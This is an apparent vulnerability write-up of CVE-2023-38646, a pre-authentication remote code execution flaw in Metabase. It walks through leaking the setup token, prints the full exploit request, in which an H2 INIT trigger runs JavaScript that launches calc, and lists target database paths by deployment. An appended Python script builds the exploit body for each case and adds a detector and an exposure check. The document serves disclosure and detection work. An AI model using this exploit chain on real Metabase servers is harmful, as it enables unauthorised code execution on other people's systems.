CVE-2023-38646 Metabase pre-auth RCE
source link: https://y4er.com/posts/cve-2023-38646-metabase-pre-auth-rce/
The two jar versions used (0.46.6 is affected; 0.46.6.1 ships the fix):
https://downloads.metabase.com/v0.46.6.1/metabase.jar
https://downloads.metabase.com/v0.46.6/metabase.jar
Requires JDK 11.
During initial setup, an H2 database can be added over JDBC.
Capturing the setup traffic shows a request to http://192.168.1.178:3000/api/session/properties whose response contains a setup-token field. That endpoint answers without any authentication, and the setup token is exactly what /api/setup/validate requires, so an unauthenticated client can submit H2 connection details of its own. Metabase opens a JDBC connection to validate them, H2 executes whatever SQL is given in the INIT parameter when that connection opens, and a trigger whose source starts with //javascript is compiled and run as JavaScript, which yields unauthenticated RCE. The captured request that triggers it:
POST /api/setup/validate HTTP/1.1
Host: 192.168.1.178:3000
Content-Length: 451
Accept: application/json
Content-Type: application/json
Cookie: metabase.DEVICE=009e2f5a-8eea-45b0-8d2d-1fafb2ee475f
Connection: close
{
    "token": "41cc5e8c-d06f-4a3d-8f84-5133323b34d8",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details": {
            "db": "file:./metabase.db;",
            "advanced-options": true,
            "ssl": true,
            "init": "CREATE TRIGGER asd BEFORE SELECT ON INFORMATION_SCHEMA.tables AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"calc\")'"
        },
        "name": "a1",
        "engine": "h2"
    }
}
The awkward part is that Metabase appends IFEXISTS=TRUE to the JDBC URL by default, so the database file named in the URL must already exist (otherwise H2 refuses the connection instead of creating a new database), and the file on disk must carry the .mv.db suffix, which the URL itself omits. Where that file lives depends on how Metabase is deployed:
In Docker: /metabase.db/metabase.db.mv.db (so db is file:/metabase.db/metabase.db;)
Started directly from the jar: ./metabase.db.mv.db (so db is file:./metabase.db; as in the request above)
Besides metabase.db there is also /plugins/sample-database.db.mv.db, which works as well, although some Docker images do not ship it.
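As an added example (not code from the original post or from Metabase), the two steps described above, reading the setup token out of /api/session/properties and building the /api/setup/validate body for each of the file locations listed, together with a detector for the request shape, in Python. The deployment-to-path table is taken from the list above; the sample properties response is constructed, the helper names are mine, and the point that the same INIT statement can also ride inside the JDBC URL as ;INIT= is a general H2 property, not something the post shows.

```python
import json
import re
import urllib.request
from typing import Optional

# Path of the H2 database file for each deployment type named in the post.
# The JDBC URL carries the name without the ".mv.db" suffix; H2 adds it, and
# because Metabase appends IFEXISTS=TRUE the file must already be present.
DB_PATHS = {
    "docker": "file:/metabase.db/metabase.db;",
    "jar": "file:./metabase.db;",
    "sample": "file:/plugins/sample-database.db;",
}

# INIT statement from the captured request in the post (launches calc.exe).
POST_INIT_SQL = (
    "CREATE TRIGGER asd BEFORE SELECT ON INFORMATION_SCHEMA.tables AS "
    "'//javascript\njava.lang.Runtime.getRuntime().exec(\"calc\")'"
)

# Constructed sample of an /api/session/properties response body (a real one
# carries many more keys); the token value is the one from the post.
SAMPLE_PROPERTIES = json.dumps({
    "site-name": "Metabase",
    "setup-token": "41cc5e8c-d06f-4a3d-8f84-5133323b34d8",
})


def extract_setup_token(properties_body: str) -> Optional[str]:
    """Return the setup-token from a /api/session/properties body, or None.
    A fixed or already-configured instance does not return the token."""
    props = json.loads(properties_body)
    token = props.get("setup-token")
    return token if isinstance(token, str) and token else None


def fetch_setup_token(base_url: str, timeout: float = 5.0) -> Optional[str]:
    """Non-destructive live check: GET /api/session/properties with no session
    and report whether a setup-token is exposed. The only network I/O here."""
    url = base_url.rstrip("/") + "/api/session/properties"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return extract_setup_token(resp.read().decode("utf-8"))


def build_validate_payload(token: str, deployment: str, init_sql: str) -> dict:
    """Build the /api/setup/validate body from the post for one deployment
    type. init_sql is handed straight to H2's INIT parameter."""
    if deployment not in DB_PATHS:
        raise ValueError(f"unknown deployment type: {deployment!r}")
    return {
        "token": token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": DB_PATHS[deployment],
                "advanced-options": True,
                "ssl": True,
                "init": init_sql,
            },
            "name": "a1",
            "engine": "h2",
        },
    }


def validate_body(token: str, deployment: str, init_sql: str) -> str:
    """Serialised request body, ready to POST or to feed the detector."""
    return json.dumps(build_validate_payload(token, deployment, init_sql))


# H2 compiles a trigger whose source begins with //javascript as JavaScript.
JS_TRIGGER_RE = re.compile(r"CREATE\s+TRIGGER\b.*?\bAS\s+'//javascript",
                           re.IGNORECASE | re.DOTALL)


def looks_like_exploit(body: str) -> bool:
    """Detection side: flag a /api/setup/validate body that configures an H2
    connection whose INIT statement (in the 'init' field, or embedded in the
    JDBC URL as ;INIT=) creates a JavaScript trigger."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return False
    if not isinstance(data, dict):
        return False
    details = data.get("details") or {}
    if details.get("engine") != "h2":
        return False
    inner = details.get("details") or {}
    candidates = [str(inner.get("init", "")), str(inner.get("db", ""))]
    return any(JS_TRIGGER_RE.search(c) for c in candidates)


if __name__ == "__main__":
    token = extract_setup_token(SAMPLE_PROPERTIES)
    print("setup-token exposed:", token is not None)
    body = validate_body(token, "jar", POST_INIT_SQL)
    print("flagged by detector:", looks_like_exploit(body))
```

fetch_setup_token is the only function that touches the network; on a patched or already-configured instance it returns None, which is the quickest non-destructive way to tell whether a deployment is exposed. Everything else works on captured bodies, so the detector can be run over proxy or WAF logs offline.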
My writing is poor, the wording careless, the content shallow and the technique clumsy. Corrections and guidance from the masters are welcome and greatly appreciated.